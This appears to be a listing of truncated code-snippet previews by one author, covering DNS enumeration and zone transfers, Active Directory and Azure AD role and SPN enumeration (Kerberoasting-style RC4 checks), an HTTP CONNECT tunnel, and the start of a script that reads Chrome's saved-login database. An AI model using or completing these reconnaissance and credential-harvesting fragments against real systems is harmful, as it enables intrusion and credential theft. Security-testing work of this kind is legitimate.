joshfinley

import subprocess
import sys

def run_dnsenum(wordlist, dns_server, domain_file):
    with open(domain_file, 'r') as file:
        domains = file.readlines()

    for domain in domains:
        domain = domain.strip()
        command = [

joshfinley

import dns.query
import dns.zone
import sys

def axfr_query(domain, nameserver):
    try:
        zone = dns.zone.from_xfr(dns.query.xfr(nameserver, domain))
        return zone
    except Exception:
        return None

joshfinley

param(
    [string]$filePath
)

Import-Module ActiveDirectory

Get-Content $filePath | ForEach-Object {
    $groupName = $_
    Write-Host "`nGroup-Name $groupName"
    Write-Host "----------------"

joshfinley

# Import the Active Directory module
Import-Module ActiveDirectory

# Group name to search for
$groupName = "YourGroupName"

# Get the group
$group = Get-ADGroup -Filter { Name -eq $groupName }

if ($group -ne $null) {

joshfinley

import paramiko
import socket
import select

def http_connect_tunnel(proxy_host, proxy_port, target_host, target_port):
    """
    Establish an HTTP CONNECT tunnel through a proxy.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((proxy_host, proxy_port))

joshfinley

# Import the Active Directory module
Import-Module ActiveDirectory

# Search for all AD objects with SPNs
$objectsWithSPN = Get-ADObject -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes

# Iterate through each object and check for RC4 encryption
foreach ($obj in $objectsWithSPN) {
    $name = $obj.Name
    $spns = $obj.ServicePrincipalName

joshfinley

# Import the Active Directory module
Import-Module ActiveDirectory

# Enumerate all user accounts with SPNs
$usersWithSPN = Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName, msDS-SupportedEncryptionTypes

# Iterate through each user and check for RC4 encryption
foreach ($user in $usersWithSPN) {
    $userName = $user.SamAccountName
    $spns = $user.ServicePrincipalName

joshfinley

import sqlite3
import shutil
import os
import win32crypt
from importlib import import_module

def get_chrome_db_path():
    """Determine the path of the Chrome history database based on the operating system."""
    if os.name == "nt":  # Windows
        return f"C:\\Users\\{os.getlogin()}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data".format(os.getlogin())

joshfinley

# Import the required module if not already imported
Import-Module AzureAD

# Login to Azure AD
Connect-AzureAD

# Get the 'Application Admin' role
$appAdminRole = Get-AzureADDirectoryRole | Where-Object {$_.displayName -eq 'Application Admin'}

# If the role hasn't been instantiated, instantiate it

joshfinley

# Install the AzureAD PowerShell module
Install-Module AzureAD# Authenticate to the tenant
$username = "username@domain.com"
$password = 'YourVeryStrongPassword'
$SecurePassword = ConvertTo-SecureString “$password” -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential($username, $SecurePassword)
Connect-AzureAD -Credential $Credential# Build our users and roles object
$UserRoles = Get-AzureADDirectoryRole | ForEach-Object {
        
    $Role = $_